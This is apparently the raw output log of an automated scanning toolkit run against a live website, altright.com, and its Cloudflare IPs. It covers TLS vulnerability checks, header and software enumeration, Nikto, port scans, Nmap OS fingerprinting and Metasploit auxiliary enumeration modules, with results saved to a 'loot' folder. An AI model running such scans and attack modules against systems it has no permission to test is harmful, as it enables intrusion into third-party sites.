  2187. Signature Algorithm ECDSA with SHA256
  2188. Server key size ECDSA 256 bits
  2189. Fingerprint / Serial SHA1 3AF38101A73A8494677D499017A4E3EFDD1904B5 / 6DBD6BD78F91E08014D6D046DB20B529
  2190. SHA256 2BE0A7BAE715E0B69AF50EE7881BEE311C24D4CDC7DFAF888B69F3D0FA69D902
  2191. Common Name (CN) sni190556.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  2192. subjectAltName (SAN) sni190556.cloudflaressl.com *.444ttg.com
  2193. *.66ddl.com *.6yyl.com *.altright.com
  2194. *.arktos.com *.biseznamka.com *.deitti-sivut.com
  2195. *.dsfredmdtom.cf *.eggendk.cf
  2196. *.embroiddesigns.net *.foragerproject.com
  2197. *.huntingdonmcdonalds.com *.jomsey.altervista.org
  2198. *.joyeati.cf *.lewfi.stream *.minnehaha-kendo.org
  2199. *.minnehahakendodojo.org *.mujeresbolivia.com
  2200. *.punkchat.co.za *.smart-eas.ru *.spankingchat.ca
  2201. *.teacoal.xyz 444ttg.com 66ddl.com 6yyl.com
  2202. altright.com arktos.com biseznamka.com
  2203. deitti-sivut.com dsfredmdtom.cf eggendk.cf
  2204. embroiddesigns.net foragerproject.com
  2205. huntingdonmcdonalds.com jomsey.altervista.org
  2206. joyeati.cf lewfi.stream minnehaha-kendo.org
  2207. minnehahakendodojo.org mujeresbolivia.com
  2208. punkchat.co.za smart-eas.ru spankingchat.ca
  2209. teacoal.xyz
  2210. Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2211. Trust (hostname) Ok via SAN (SNI mandatory)
  2212. Chain of trust Ok
  2213. EV cert (experimental) no
  2214. Certificate Expiration 143 >= 60 days (2017-08-11 20:00 --> 2018-02-18 18:59 -0500)
  2215. # of certificates provided 3
  2216. Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  2217. OCSP URI http://ocsp.comodoca4.com
  2218. OCSP stapling offered
  2219. OCSP must staple no
  2220. DNS CAA RR (experimental) --
  2221. Certificate Transparency yes (TLS extension)
  2222.  
  2223.  
  2224. Testing HTTP header response @ "/"
  2225.  
  2226. HTTP Status Code 200 OK
  2227. HTTP clock skew +2 (± 1.5) sec from localtime
  2228. Strict Transport Security --
  2229. Public Key Pinning --
  2230. Server banner cloudflare-nginx
  2231. Application banner X-Powered-By: PHP/5.6.31
  2232. Cookie(s) 2 issued: 2/2 secure, 2/2 HttpOnly
  2233. Security headers --
  2234. Reverse Proxy banner --
  2235.  
  2236.  
  2237. Testing vulnerabilities
  2238.  
  2239. Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  2240. CCS (CVE-2014-0224) not vulnerable (OK)
  2241. Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
  2242. Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  2243. Secure Client-Initiated Renegotiation not vulnerable (OK)
  2244. CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  2245. BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  2246. Can be ignored for static pages or if no secrets in the page
  2247. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  2248. TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  2249. SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  2250. FREAK (CVE-2015-0204) not vulnerable (OK)
  2251. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  2252. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  2253. LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  2254. BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
  2255. ECDHE-ECDSA-AES256-SHA
  2256. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  2257. LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  2258. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  2259.  
  2260.  
  2261. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
  2262.  
  2263. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  2264. -----------------------------------------------------------------------------------------------------------------------------
  2265. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2266. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  2267. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  2268. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  2269. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  2270. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  2271. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  2272. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  2273.  
  2274.  
  2275. Running client simulations via sockets
  2276.  
  2277. Android 2.3.7 No connection
  2278. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2279. Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2280. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2281. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2282. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2283. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  2284. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  2285. Chrome 57 Win 7 No connection
  2286. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2287. Firefox 53 Win 7 No connection
  2288. IE 6 XP No connection
  2289. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2290. IE 8 XP No connection
  2291. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2292. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2293. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2294. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2295. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2296. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2297. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2298. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2299. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2300. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2301. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2302. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2303. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2304. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2305. Java 6u45 No connection
  2306. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2307. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2308. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2309. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2310.  
  2311. Done 2017-09-28 08:13:02 [ 449s] -->> 104.27.178.91:443 (altright.com) <<--
  2312.  
  2313. -----------------------------------------------------
  2314. Done testing now all IP addresses (on port 443): 104.27.179.91 104.27.178.91
  2315.  
  2316.  
  2317. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
  2318. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  2319. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  2320. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  2321. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
  2322. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
  2323. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
  2324. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  2325. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  2326. ░ ░
  2327. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
  2328. + -- --=[Scan Complete!
  2329. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  2330. + -- --=[Checking if X-Content options are enabled on altright.com...
  2331.  
  2332. + -- --=[Checking if X-Frame options are enabled on altright.com...
  2333.  
  2334. + -- --=[Checking if X-XSS-Protection header is enabled on altright.com...
  2335.  
  2336. + -- --=[Checking HTTP methods on altright.com...
  2337.  
  2338. + -- --=[Checking if TRACE method is enabled on altright.com...
  2339.  
  2340. + -- --=[Checking for META tags on altright.com...
  2341. <div class="post-meta clear-fix">
  2342. <div class="meta-comment">
  2343. <div class="post-meta clear-fix">
  2344. <div class="meta-comment">
  2345. <div class="post-meta clear-fix">
  2346. <div class="meta-comment">
  2347. <div class="post-meta clear-fix">
  2348. <div class="meta-comment">
  2349. <div class="post-meta clear-fix">
  2350. <div class="meta-comment">
  2351.  
  2352. + -- --=[Checking for open proxy on altright.com...
  2353.  
  2354. + -- --=[Enumerating software on altright.com...
  2355. x-powered-by: PHP/5.6.31
  2356. server: cloudflare-nginx
  2357.  
  2358. + -- --=[Checking if Strict-Transport-Security is enabled on altright.com...
  2359.  
  2360. + -- --=[Checking for Flash cross-domain policy on altright.com...
  2361. </script>
  2362. <script type='text/javascript' src='https://altright.com/wp-content/mmr/92266b7b-1484416759.min.js'></script>
  2363. <script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script>
  2364. <script type='text/javascript'>
  2365. _stq = window._stq || [];
  2366. _stq.push([ 'view', {v:'ext',j:'1:5.3',blog:'99656275',post:'0',tz:'-4',srv:'altright.com'} ]);
  2367. _stq.push([ 'clickTrackerInit', '99656275', '0' ]);
  2368. </script>
  2369. </body>
  2370. </html>
  2371. + -- --=[Checking for Silverlight cross-domain policy on altright.com...
  2372. </script>
  2373. <script type='text/javascript' src='https://altright.com/wp-content/mmr/92266b7b-1484416759.min.js'></script>
  2374. <script type='text/javascript' src='https://stats.wp.com/e-201739.js' async defer></script>
  2375. <script type='text/javascript'>
  2376. _stq = window._stq || [];
  2377. _stq.push([ 'view', {v:'ext',j:'1:5.3',blog:'99656275',post:'0',tz:'-4',srv:'altright.com'} ]);
  2378. _stq.push([ 'clickTrackerInit', '99656275', '0' ]);
  2379. </script>
  2380. </body>
  2381. </html>
  2382. + -- --=[Checking for HTML5 cross-origin resource sharing on altright.com...
  2383.  
  2384. + -- --=[Retrieving robots.txt on altright.com...
  2385. Sitemap: https://altright.com/sitemap.xml
  2386. Sitemap: https://altright.com/news-sitemap.xml
  2387. User-agent: *
  2388. Disallow: /wp-admin/
  2389. Allow: /wp-admin/admin-ajax.php
  2390.  
  2391. + -- --=[Retrieving sitemap.xml on altright.com...
  2392. <?xml version="1.0" encoding="UTF-8"?>
  2393. <!--generator='jetpack-5.3'-->
  2394. <?xml-stylesheet type="text/xsl" href="https://altright.com/sitemap-index.xsl"?>
  2395. <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://altright.com/sitemap-1.xml</loc><lastmod>2017-09-28T08:37:00Z</lastmod></sitemap><sitemap><loc>https://altright.com/image-sitemap-1.xml</loc><lastmod>2017-09-27T17:56:15Z</lastmod></sitemap></sitemapindex>
  2396.  
  2397. + -- --=[Checking cookie attributes on altright.com...
  2398. set-cookie: __cfduid=de49c65298b1f115523ab9284f1c5918f1506600795; expires=Fri, 28-Sep-18 12:13:15 GMT; path=/; domain=.altright.com; HttpOnly; Secure
  2399. set-cookie: wfvt_2729720346=59cce75c651aa; expires=Thu, 28-Sep-2017 12:43:16 GMT; Max-Age=1800; path=/; secure; httponly
  2400.  
  2401. + -- --=[Checking for ASP.NET Detailed Errors on altright.com...
  2402. .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
  2403. <body class="error404">
  2404. <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
  2405. <div class="error-number">
  2406. <h4 class="kid-error-title">Page not found</h4>
  2407. .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
  2408. <body class="error404">
  2409. <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
  2410. <div class="error-number">
  2411. <h4 class="kid-error-title">Page not found</h4>
  2412.  
  2413.  
  2414. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  2415. - Nikto v2.1.6
  2416. ---------------------------------------------------------------------------
  2417. + Target IP: 104.27.179.91
  2418. + Target Hostname: altright.com
  2419. + Target Port: 443
  2420. ---------------------------------------------------------------------------
  2421. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni190556.cloudflaressl.com
  2422. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
  2423. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  2424. + Start Time: 2017-09-28 08:13:18 (GMT-4)
  2425. ---------------------------------------------------------------------------
  2426. + Server: cloudflare-nginx
  2427. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2428. + Uncommon header 'cf-ray' found, with contents: 3a569db228f22216-EWR
  2429. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  2430. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2431. + All CGI directories 'found', use '-C none' to test none
  2432. + Hostname 'altright.com' does not match certificate's names: sni190556.cloudflaressl.com
  2433. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
  2434. at /var/lib/nikto/plugins/LW2.pm line 5157.
  2435. ; at /var/lib/nikto/plugins/LW2.pm line 5157.
  2436. + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
  2437. + End Time: 2017-09-28 08:14:11 (GMT-4) (53 seconds)
  2438. ---------------------------------------------------------------------------
  2439. + 1 host(s) tested
  2440. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  2441. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/altright.com-port443.jpg
  2442. + -- --=[Port 445 closed... skipping.
  2443. + -- --=[Port 512 closed... skipping.
  2444. + -- --=[Port 513 closed... skipping.
  2445. + -- --=[Port 514 closed... skipping.
  2446. + -- --=[Port 623 closed... skipping.
  2447. + -- --=[Port 624 closed... skipping.
  2448. + -- --=[Port 1099 closed... skipping.
  2449. + -- --=[Port 1433 closed... skipping.
  2450. + -- --=[Port 2049 closed... skipping.
  2451. + -- --=[Port 2121 closed... skipping.
  2452. + -- --=[Port 3306 closed... skipping.
  2453. + -- --=[Port 3310 closed... skipping.
  2454. + -- --=[Port 3128 closed... skipping.
  2455. + -- --=[Port 3389 closed... skipping.
  2456. + -- --=[Port 3632 closed... skipping.
  2457. + -- --=[Port 4443 closed... skipping.
  2458. + -- --=[Port 5432 closed... skipping.
  2459. + -- --=[Port 5800 closed... skipping.
  2460. + -- --=[Port 5900 closed... skipping.
  2461. + -- --=[Port 5984 closed... skipping.
  2462. + -- --=[Port 6000 closed... skipping.
  2463. + -- --=[Port 6667 closed... skipping.
  2464. + -- --=[Port 8000 closed... skipping.
  2465. + -- --=[Port 8100 closed... skipping.
  2466. + -- --=[Port 8080 opened... running tests...
  2467.  
  2468. ^ ^
  2469. _ __ _ ____ _ __ _ _ ____
  2470. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2471. | V V // o // _/ | V V // 0 // 0 // _/
  2472. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2473. <
  2474. ...'
  2475.  
  2476. WAFW00F - Web Application Firewall Detection Tool
  2477.  
  2478. By Sandro Gauci && Wendel G. Henrique
  2479.  
  2480. Checking http://altright.com:8080
  2481. The site http://altright.com:8080 is behind a CloudFlare
  2482. Number of requests: 1
  2483.  
  2484. http://altright.com:8080 [301 Moved Permanently] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.179.91], RedirectLocation[https://altright.com/], UncommonHeaders[cf-ray]
  2485. https://altright.com/ [200 OK] CloudFlare, Cookies[__cfduid,wfvt_2729720346], Country[UNITED STATES][US], Google-Analytics[Universal][UA-90381947-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid,wfvt_2729720346], IP[104.27.179.91], MetaGenerator[WordPress 4.8.2], Open-Graph-Protocol[website], PHP[5.6.31], Script[application/javascript,text/javascript], Title[AltRight.com], UncommonHeaders[link,cf-ray], WordPress[4.8.2], X-Powered-By[PHP/5.6.31]
  2486.  
  2487.  
  2488. __ ______ _____
  2489. \ \/ / ___|_ _|
  2490. \ /\___ \ | |
  2491. / \ ___) || |
  2492. /_/\_|____/ |_|
  2493.  
  2494. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2495. + -- --=[Target: altright.com:8080
  2496. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2497. + -- --=[Site not vulnerable to Host Header Injection!
  2498. + -- --=[Site vulnerable to Cross-Frame Scripting!
  2499. + -- --=[Site vulnerable to Clickjacking!
  2500.  
  2501. HTTP/1.1 405 Not Allowed
  2502. Date: Thu, 28 Sep 2017 12:14:24 GMT
  2503. Content-Type: text/html
  2504. Content-Length: 177
  2505. Connection: close
  2506. Server: -nginx
  2507. CF-RAY: -
  2508.  
  2509. <html>
  2510. <head><title>405 Not Allowed</title></head>
  2511. <body bgcolor="white">
  2512. <center><h1>405 Not Allowed</h1></center>
  2513. <hr><center>cloudflare-nginx</center>
  2514. </body>
  2515. </html>
  2516.  
  2517. HTTP/1.1 301 Moved Permanently
  2518. Date: Thu, 28 Sep 2017 12:14:25 GMT
  2519. Transfer-Encoding: chunked
  2520. Connection: keep-alive
  2521. Cache-Control: max-age=3600
  2522. Expires: Thu, 28 Sep 2017 13:14:25 GMT
  2523. Location: https://altright.com/
  2524. Server: cloudflare-nginx
  2525. CF-RAY: 3a569f5165c81043-CDG
  2526.  
  2527. 0
  2528.  
  2529.  
  2530.  
  2531.  
  2532. Version: 1.11.10-static
  2533. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2534.  
  2535. Testing SSL server altright.com on port 8080 using SNI name altright.com
  2536.  
  2537. TLS Fallback SCSV:
  2538. Server does not support TLS Fallback SCSV
  2539.  
  2540. TLS renegotiation:
  2541. Session renegotiation not supported
  2542.  
  2543. TLS Compression:
  2544. Compression disabled
  2545.  
  2546. Heartbleed:
  2547. TLS 1.2 not vulnerable to heartbleed
  2548. TLS 1.1 not vulnerable to heartbleed
  2549. TLS 1.0 not vulnerable to heartbleed
  2550.  
  2551. Supported Server Cipher(s):
  2552. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
  2553. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  2554. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  2555. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  2556. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
  2557. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
  2558. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
  2559. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  2560. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  2561. ░ ░
  2562. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
  2563. + -- --=[Scan Complete!
  2564. - Nikto v2.1.6
  2565. ---------------------------------------------------------------------------
  2566. + Target IP: 104.27.179.91
  2567. + Target Hostname: altright.com
  2568. + Target Port: 8080
  2569. + Start Time: 2017-09-28 08:14:27 (GMT-4)
  2570. ---------------------------------------------------------------------------
  2571. + Server: cloudflare-nginx
  2572. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2573. + Uncommon header 'cf-ray' found, with contents: 3a569f61e6483c47-CDG
  2574. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2575. + All CGI directories 'found', use '-C none' to test none
  2576. + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
  2577. + 26101 requests: 1 error(s) and 3 item(s) reported on remote host
  2578. + End Time: 2017-09-28 11:39:53 (GMT-4) (12326 seconds)
  2579. ---------------------------------------------------------------------------
  2580. + 1 host(s) tested
  2581.  
  2582. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 11:40 EDT
  2583. Nmap scan report for altright.com (104.27.178.91)
  2584. Host is up (0.15s latency).
  2585. Other addresses for altright.com (not scanned): 2400:cb00:2048:1::681b:b35b 2400:cb00:2048:1::681b:b25b 104.27.179.91
  2586.  
  2587. PORT STATE SERVICE VERSION
  2588. 8080/tcp open http Cloudflare nginx
  2589. |_http-server-header: cloudflare-nginx
  2590. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2591. Device type: general purpose
  2592. Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
  2593. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
  2594. Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
  2595. No exact OS matches for host (test conditions non-ideal).
  2596. Network Distance: 8 hops
  2597.  
  2598. TRACEROUTE (using port 8080/tcp)
  2599. HOP RTT ADDRESS
  2600. 1 153.60 ms 10.13.0.1
  2601. 2 162.63 ms 37.187.24.252
  2602. 3 158.17 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  2603. 4 ...
  2604. 5 261.49 ms be99-1106.gsw-1-a9.fr.eu (91.121.215.177)
  2605. 6 261.53 ms be99-2.th2-1-a9.fr.eu (37.187.36.214)
  2606. 7 174.49 ms equinix-paris.cloudflare.com (195.42.144.143)
  2607. 8 168.96 ms 104.27.178.91
  2608.  
  2609. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2610. Nmap done: 1 IP address (1 host up) scanned in 35.24 seconds
  2611.  
  2612. # cowsay++
  2613. ____________
  2614. < metasploit >
  2615. ------------
  2616. \ ,__,
  2617. \ (oo)____
  2618. (__) )\
  2619. ||--|| *
  2620.  
  2621.  
  2622. =[ metasploit v4.16.8-dev ]
  2623. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  2624. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  2625. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2626.  
  2627. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  2628. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  2629. [-] Unknown command: “spool.
  2630. RHOST => altright.com
  2631. [-] WAR file not found
  2632. [*] Auxiliary module execution completed
  2633. RHOSTS => altright.com
  2634. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  2635. RHOST => altright.com
  2636. RPORT => 8080
  2637. [*] Scanned 1 of 4 hosts (25% complete)
  2638. [*] Scanned 2 of 4 hosts (50% complete)
  2639. [*] Scanned 3 of 4 hosts (75% complete)
  2640. [*] Scanned 4 of 4 hosts (100% complete)
  2641. [*] Auxiliary module execution completed
  2642. [*] Attempting to connect to 2400:cb00:2048:1::681b:b25b:8080
  2643. [+] No File(s) found
  2644. [*] Scanned 1 of 4 hosts (25% complete)
  2645. [*] Attempting to connect to 2400:cb00:2048:1::681b:b35b:8080
  2646. [+] No File(s) found
  2647. [*] Scanned 2 of 4 hosts (50% complete)
  2648. [*] Attempting to connect to 104.27.179.91:8080
  2649. [+] No File(s) found
  2650. [*] Scanned 3 of 4 hosts (75% complete)
  2651. [*] Attempting to connect to 104.27.178.91:8080
  2652. [+] No File(s) found
  2653. [*] Scanned 4 of 4 hosts (100% complete)
  2654. [*] Auxiliary module execution completed
  2655. [*] 2400:cb00:2048:1::681b:b25b:8080 -
  2656. [*] 2400:cb00:2048:1::681b:b25b:8080 -
  2657. [-] http://2400:cb00:2048:1::681b:b25b:8080/admin/j_security_check - Unable to enumerate users with this URI
  2658. [*] Scanned 1 of 4 hosts (25% complete)
  2659. [*] 2400:cb00:2048:1::681b:b35b:8080 -
  2660. [*] 2400:cb00:2048:1::681b:b35b:8080 -
  2661. [-] http://2400:cb00:2048:1::681b:b35b:8080/admin/j_security_check - Unable to enumerate users with this URI
  2662. [*] Scanned 2 of 4 hosts (50% complete)
  2663. [*] 104.27.179.91:8080 -
  2664. [*] 104.27.179.91:8080 -
  2665. [-] http://104.27.179.91:8080/admin/j_security_check - Unable to enumerate users with this URI
  2666. [*] Scanned 3 of 4 hosts (75% complete)
  2667. [*] 104.27.178.91:8080 -
  2668. [*] 104.27.178.91:8080 -
  2669. [-] http://104.27.178.91:8080/admin/j_security_check - Unable to enumerate users with this URI
  2670. [*] Scanned 4 of 4 hosts (100% complete)
  2671. [*] Auxiliary module execution completed
  2672. [-] 2400:cb00:2048:1::681b:b25b:8080 -
  2673. [*] Scanned 1 of 4 hosts (25% complete)
  2674. [-] 2400:cb00:2048:1::681b:b35b:8080 -
  2675. [*] Scanned 2 of 4 hosts (50% complete)
  2676. [-] 104.27.179.91:8080 -
  2677. [*] Scanned 3 of 4 hosts (75% complete)
  2678. [-] 104.27.178.91:8080 -
  2679. [*] Scanned 4 of 4 hosts (100% complete)
